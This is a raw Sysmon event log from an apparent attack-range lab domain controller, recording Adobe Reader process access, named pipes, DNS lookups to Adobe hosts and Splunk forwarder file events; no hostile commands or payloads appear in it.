10341000x800000000000000047351Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.580{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000047350Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:20.575{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.5768.5827570577375827158C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 17141700x800000000000000047349Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:20.575{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.5768.5827570577375827158C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 10341000x800000000000000047348Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.499{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047347Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.498{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047346Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.498{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000047345Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:17.967{FE4C2B44-E64A-63C7-8706-00000000AF02}1400acroipm2.adobe.com0type: 5 acroipm2.adobe.com.edgesuite.net;type: 5 a122.dscd.akamai.net;::ffff:23.220.206.57;::ffff:23.220.206.48;C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 22542200x800000000000000047344Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:17.953{FE4C2B44-E652-63C7-8C06-00000000AF02}7044armmf.adobe.com0type: 5 ssl.adobe.com.edgekey.net;type: 5 e4578.dscb.akamaiedge.net;23.78.8.145;C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 10341000x800000000000000047343Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.454{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047342Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.453{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047341Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.453{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000047340Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.446{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D85E008F81117369CB404C8A20772F6,SHA256=6135ED14AF321327D3D6311F6DD711A9E8539260318F1D80BAC41AD7264B71D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047339Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.387{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ACE6EFCDE6E0F8370D9149EAB9407EEE,SHA256=3A0132F1EB9B3B4D7417A5505320CF3CC56ED5644B1CF89B85FAD56F4AE52BC5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047338Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.371{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047337Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.371{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047336Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.371{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047335Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.371{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047334Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.371{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047333Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.371{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047332Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.371{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047331Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.371{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047330Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.371{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047329Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.371{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047328Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.371{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader 